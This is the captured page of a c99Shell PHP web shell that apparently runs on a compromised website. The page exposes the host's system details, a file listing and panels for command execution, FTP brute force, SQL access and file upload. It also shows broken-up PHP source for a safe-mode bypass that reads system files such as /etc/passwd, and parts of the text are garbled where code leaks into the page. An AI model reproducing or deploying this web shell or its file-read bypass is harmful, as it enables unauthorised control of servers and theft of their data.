www.opus8.com - phpshell

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.3.3 

uname -a: Linux linux-web.lore.net 2.6.18-371.12.1.el5 #1 SMP Wed Sep 3 16:22:34 EDT 2014 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache) context=user_u:system_r:httpd_t:s0 

Safe-mode: OFF (not secure)

/var/www/vhosts/opus8/   drwxr-xr-x
Free 6.03 GB of 27.03 GB (22.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Owned by hacker

Listing folder (20 files and 8 folders):

NameAsc. Size Modify Owner/Group Perms Action
 .. LINK 20.11.2014 16:33:13 0/0 drwxr-xr-x Info 
 . LINK 11.12.2013 19:50:41 0/0 drwxr-xr-x Info 
 [themes] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [includes] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [misc] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [modules] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [temp] DIR 01.04.2015 15:08:23 0/0 drwxrwxrwx Info 
 [profiles] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [sites] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [scripts] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 robots.txt 1.52 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 COPYRIGHT.txt 1.45 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.sqlite.txt 1.27 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 authorize.php 6.45 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 install.php 703 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 LICENSE.txt 17.67 KB 17.09.2011 17:50:20 0/0 -rw-r--r-- Info Change Download 
 xmlrpc.php 417 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.mysql.txt 1.42 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 README.txt 5.25 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 .htaccess 5.63 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.txt 17.44 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 .gitignore 174 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 UPGRADE.txt 9.42 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 CHANGELOG.txt 80.16 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 web.config 2.13 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.pgsql.txt 1.83 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 index.php 529 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 cron.php 720 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 MAINTAINERS.txt 8 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 update.php 19.47 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 

    


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Trying To Get File $get
"; if(copy("compress.zlib://".$file, $temp)){ $fichier = fopen($temp, "r"); $action = fread($fichier, filesize($temp)); fclose($fichier); $source=htmlspecialchars($action); echo "
Start $get

$source

Fin $get
"; unlink($temp); } else { die("
Sorry... File ".htmlspecialchars($file)." dosen't exists or you don't have access.
"); } echo "
"; } if(isset($_GET['file'])) { rsg_read(); } ?> $chemin
"; foreach ($files as $filename) { echo "
";
   echo "$filename\n";
   echo "
"; } } if(isset($_GET['directory'])) { rsg_glob(); } ?>
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0203 ]--